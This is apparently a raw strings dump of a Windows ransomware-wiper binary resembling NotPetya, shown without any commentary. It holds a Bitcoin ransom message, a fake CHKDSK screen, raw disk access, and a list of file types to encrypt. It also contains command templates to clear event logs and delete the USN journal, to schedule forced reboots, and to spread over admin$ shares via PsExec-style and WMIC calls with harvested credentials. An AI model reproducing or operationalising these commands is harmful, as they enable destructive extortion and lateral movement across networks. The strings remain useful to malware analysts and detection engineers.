.text
`.rdata
@.data
.rsrc
@.reloc
PVVhH
QSVWh
L$@Qj
VV@PVVh
PVVVVh
D$<PSSh
Fast decoding Code from Chris Anderson
invalid literal/length code
invalid distance code
invalid distance too far back
1.2.8
incorrect header check
unknown compression method
invalid window size
unknown header flags set
header crc mismatch
invalid block type
invalid stored block lengths
too many length or distance symbols
invalid code lengths set
invalid bit length repeat
invalid code -- missing end-of-block
invalid literal/lengths set
invalid distances set
invalid literal/length code
invalid distance code
invalid distance too far back
incorrect data check
incorrect length check
need dictionary
stream end
file error
stream error
data error
insufficient memory
buffer error
incompatible version
inflate 1.2.8 Copyright 1995-2013 Mark Adler
\\.\PhysicalDrive
123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz
1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX
IsWow64Process
GetExtendedTcpTable
ntdll.dll
NtRaiseHardError
\\.\C:
\\.\PhysicalDrive0
255.255.255.255
%u.%u.%u.%u
CreateFileA
HeapAlloc
SetFilePointerEx
HeapFree
GetProcessHeap
WriteFile
ReadFile
GetSystemDirectoryA
GetLastError
DeviceIoControl
CloseHandle
FindFirstFileW
MapViewOfFile
UnmapViewOfFile
GetDriveTypeW
WaitForSingleObject
GetLogicalDrives
FlushViewOfFile
Sleep
CreateFileW
GetFileSizeEx
FindClose
LocalAlloc
CreateFileMappingW
FindNextFileW
LocalFree
CreateThread
GetTickCount
MultiByteToWideChar
LeaveCriticalSection
SetLastError
EnterCriticalSection
HeapReAlloc
InitializeCriticalSection
InterlockedExchange
GetTempFileNameW
PeekNamedPipe
CreateProcessW
GetCurrentProcess
ConnectNamedPipe
GetModuleHandleW
CreateNamedPipeW
TerminateThread
DisconnectNamedPipe
FlushFileBuffers
GetTempPathW
GetProcAddress
DeleteFileW
FreeLibrary
GlobalAlloc
LoadLibraryW
GetComputerNameExW
GlobalFree
ExitProcess
GetVersionExW
GetModuleFileNameW
DisableThreadLibraryCalls
ResumeThread
GetEnvironmentVariableW
GetFileSize
SetFilePointer
FindResourceW
LoadResource
GetCurrentThread
OpenProcess
GetSystemDirectoryW
SizeofResource
GetLocalTime
Process32FirstW
LockResource
Process32NextW
GetModuleHandleA
lstrcatW
CreateToolhelp32Snapshot
GetWindowsDirectoryW
VirtualFree
VirtualAlloc
LoadLibraryA
VirtualProtect
WideCharToMultiByte
GetExitCodeProcess
WaitForMultipleObjects
KERNEL32.dll
wsprintfW
ExitWindowsEx
wsprintfA
USER32.dll
CryptReleaseContext
CryptAcquireContextA
CryptGenRandom
CryptExportKey
CryptAcquireContextW
CryptSetKeyParam
CryptImportKey
CryptEncrypt
CryptGenKey
CryptDestroyKey
InitializeSecurityDescriptor
SetSecurityDescriptorDacl
CredFree
CredEnumerateW
SetThreadToken
OpenProcessToken
LookupPrivilegeValueW
AdjustTokenPrivileges
GetSidSubAuthority
OpenThreadToken
GetSidSubAuthorityCount
GetTokenInformation
SetTokenInformation
DuplicateTokenEx
InitiateSystemShutdownExW
CreateProcessAsUserW
ADVAPI32.dll
CommandLineToArgvW
SHGetFolderPathW
SHELL32.dll
StringFromCLSID
CoCreateGuid
CoTaskMemFree
ole32.dll
CryptDecodeObjectEx
CryptStringToBinaryW
CryptBinaryToStringW
CRYPT32.dll
PathFindExtensionW
StrStrIW
PathCombineW
StrStrW
StrCatW
StrChrW
StrToIntW
StrCmpIW
StrCmpW
PathFileExistsW
PathFindFileNameW
PathAppendW
SHLWAPI.dll
GetIpNetTable
GetAdaptersInfo
IPHLPAPI.DLL
WS2_32.dll
WNetCloseEnum
WNetOpenEnumW
WNetEnumResourceW
WNetCancelConnection2W
WNetAddConnection2W
MPR.dll
NetServerEnum
NetApiBufferFree
NetServerGetInfo
NETAPI32.dll
DhcpRpcFreeMemory
DhcpGetSubnetInfo
DhcpEnumSubnets
DhcpEnumSubnetClients
DHCPSAPI.DLL
msvcrt.dll
memcpy
malloc
_itoa
memset
perfc.dat
bHbGcDiHpY`
.text
`.rdata
@.data
@.rsrc
@.reloc
QSVh<
FindResourceW
LoadResource
CreateProcessW
HeapAlloc
HeapFree
GetProcessHeap
WriteFile
SizeofResource
CreateFileW
LockResource
CloseHandle
KERNEL32.dll
IsProcessorFeaturePresent
.text
`.rdata
@.data
.pdata
@.rsrc
CreateProcessW
CloseHandle
WriteFile
CreateFileW
HeapFree
HeapAlloc
GetProcessHeap
SizeofResource
LockResource
LoadResource
FindResourceW
KERNEL32.dll
rp>?C\@*BB@rp>3<?3<@\Crp<&R>?RB\C@r
sSsAsCsCsCsSsFs]sCsss
u)u)uDuGuFu[uDuGu[uFuDu[uGu)u<u%u6uQuuuJJJJJu
5mE'%%%
0123456789abcdef
CHKDSK is repairing sector
Please reboot your computer!
Decrypting sector
Key:
%)
4=@w|
2S1]-'e
^c_B~
hn vF
Vzs.i
%<PPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGX
9"</<|</>
;4<8<<<@<D<H<L<
zw9gj
Send your Bitcoin wallet ID and personal installation key to e-mail
MIIBCgKCAQEAxP/VqKc0yLe9JhVqFMQGwUITO6WpXWnKSNQAYT0O65Cr8PjIQInTeHkXEjfO2n2JmURWV/uHB0ZrlQ/wcYJBwLhQ9EqJ3iDqmN19Oo7NtyEUmbYmopcq+YLIBZzQ2ZTK0A2DtX4GRKxEEFLCy7vP12EYOPXknVy/+mf0JFWixz29QiTf5oLu15wVLONCuEibGaNNpgq+CXsPwfITDbDDmdrRIiUEUw6o3pt5pNOskfOJbMan2TZu6zfhzuts7KafP5UA8/0Hmf5K3/F9Mf9SE68EZjK+cIiFlKeWndP0XfRCYXI9AJYCeaOu7CXF6U0AVNnNjvLeOn42LHFUK4o6JwIDAQAB
C:\Windows;
.3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.
Microsoft Enhanced RSA and AES Cryptographic Provider
README.TXT
"%ws:%ws"
kernel32.dll
\\.\pipe\%ws
"%ws" %ws
iphlpapi.dll
e%u.%u.%u.%u
TERMSRV/
127.0.0.1
localhost
SeTcbPrivilege
SeShutdownPrivilege
SeDebugPrivilege
C:\Windows\
/c %ws
ComSpec
\cmd.exe
wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D %c:
schtasks %ws/Create /SC once /TN "" /TR "%ws" /ST %02d:%02d
at %02d:%02d %ws
shutdown.exe /r /f
/RU "SYSTEM"
dllhost.dat
u%s \\%s -accepteula -s
-d C:\Windows\System32\rundll32.exe "C:\Windows\%s",#1
wbem\wmic.exe
%s /node:"%ws" /user:"%ws" /password:"%ws"
process call create "C:\Windows\System32\rundll32.exe \"C:\Windows\%s\" #1
\\%s\admin$
\\%ws\admin$\%ws
c:\Windows\
rundll32.exe
rundll32.exe
c:\Windows\